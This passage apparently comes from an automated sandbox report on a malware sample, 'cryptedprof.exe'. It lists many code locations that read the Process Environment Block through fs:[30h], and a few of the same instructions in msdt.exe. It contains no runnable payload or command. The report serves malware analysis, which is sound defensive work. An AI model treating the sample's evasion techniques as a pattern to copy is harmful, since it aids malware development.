          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B44257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B85BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B63D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04761074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04752073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
